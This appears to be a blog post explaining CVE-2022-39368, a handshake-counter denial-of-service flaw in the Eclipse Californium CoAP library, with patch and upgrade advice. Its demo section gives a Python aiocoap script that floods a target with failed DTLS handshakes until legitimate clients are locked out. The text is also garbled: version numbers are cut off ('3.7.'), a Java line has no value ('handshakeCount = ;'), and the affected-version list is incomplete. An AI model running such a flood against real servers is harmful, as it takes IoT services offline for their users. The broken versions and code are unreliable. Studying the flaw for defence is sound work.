Eclipse Californium is a Java library that implements the Constrained Application Protocol (CoAP), RFC 7252. It's widely used to build IoT Cloud services, connecting tiny devices reliably and securely over the Internet. However, in late 2022, researchers discovered a severe flaw affecting almost every user of this library before versions 3.7. and 2.7.4. This post explores CVE-2022-39368, how it works, and shows why even protocol-level counters matter for security.

What is CVE-2022-39368?

In short, CVE-2022-39368 is a Denial of Service (DoS) vulnerability in Eclipse Californium. Due to improper cleanup of handshake counters during failed TLS/DTLS handshakes, the throttling mechanism gets stuck. As a result, legitimate connections can be permanently dropped, knocking devices and servers offline without the chance of quick recovery.

Vulnerable Versions:

2.7.x before 2.7.4

Fixed in:  
- Commit 726bac5 (main branch)  
- Commit 5648ac (2.7.x)

How the Vulnerability Happens

Eclipse Californium protects against excessive handshakes (which can indicate abuse) by throttling new handshake requests. Each attempt increments a counter, which should reset once the process is complete. But, due to a bug, if a handshake fails (because of, say, a wrong certificate or bad PSK), the counter is not decremented.

An attacker can keep triggering failed handshakes and quickly saturate the counter. When the threshold is reached, new handshakes are permanently dropped, locking out ALL legitimate clients—including those not involved in any attack!

Which Handshakes?

- DTLS/TLS with certificates (reported): Main vector, as initially reported.
- DTLS/TLS with PSK: Also affected, though not as much coverage in public reports.

Demo: Exploiting CVE-2022-39368

Let's see how a script might exploit this vulnerability against a Californium-powered CoAP server.

Code Snippet: Simulating Attack with Python and aiocoap

Here's a simple example, using Python’s aiocoap and tinydtls (as client), repeatedly sending handshake requests with wrong PSK or certificate:

import asyncio
from aiocoap import *
import ssl

async def flood_handshakes(target_uri, invalid_identity, invalid_key, attempts=500):
    for i in range(attempts):
        # Set up context with intentionally bad credentials
        context = await Context.create_client_context(dtls_params={
            'psk': {invalid_identity: invalid_key}
        })

        try:
            # Attempt a GET, just to initiate a handshake
            request = Message(code=GET, uri=target_uri)
            response = await context.request(request).response
        except Exception as e:
            # Handshake will fail, which is expected!
            print(f"Attempt {i+1}: Handshake failed as expected.")
        finally:
            await context.shutdown()

if __name__ == "__main__":
    asyncio.run(
        flood_handshakes(
            "coaps://victim.example.com/resource",
            invalid_identity="attacker",
            invalid_key="badsecret",
            attempts=100  # Adjust to reach server's handshake throttle
        )
    )

Over time, server's handshake throttling counter is saturated

Result:  
No one (even legitimate devices!) can connect until the server restarts.

Here’s a simplified version of how the buggy Java code looked

public class HandshakeThrottler {
  private int handshakeCount = ;
  private final int MAX_HANDSHAKES = 10;
  
  public boolean allowHandshake() {
    if (handshakeCount >= MAX_HANDSHAKES) {
      return false;
    }
    handshakeCount++;
    return true;
  }
  
  // Buggy: This method was only called for successful handshakes
  public void onHandshakeSuccess() {
    handshakeCount--;
  }
  
  // Missing: Should also decrement on failure!
}

Patched:

- Main: commit 726bac5
 - 2.7.x: commit 5648ac

Release fixed: 3.7. and 2.7.4

The fix made sure to clear the handshake counter on *all* handshake terminations, not just the successful ones.

References

- GitHub Advisory
- Eclipse Californium 3.7. Release Notes
- Official Commit fixing main branch

Upgrade now: If you use Eclipse Californium, update to v3.7. or 2.7.4 IMMEDIATELY!

- No workaround: There’s no effective way to patch or mitigate this—only the official update closes the hole.

Audit your services: Make sure all IoT endpoints and services are on patched versions.

CVE-2022-39368 is proof that security is built on details. Even a wrongly cleaned-up counter can open your servers to denial of service. If you use IoT protocols, stay vigilant and keep dependencies up to date.

- CVE entry on GitHub
- Californium main branch fix
- RFC 7252 (CoAP)

Timeline

Published on: 11/10/2022 00:15:00 UTC
Last modified on: 11/17/2022 21:39:00 UTC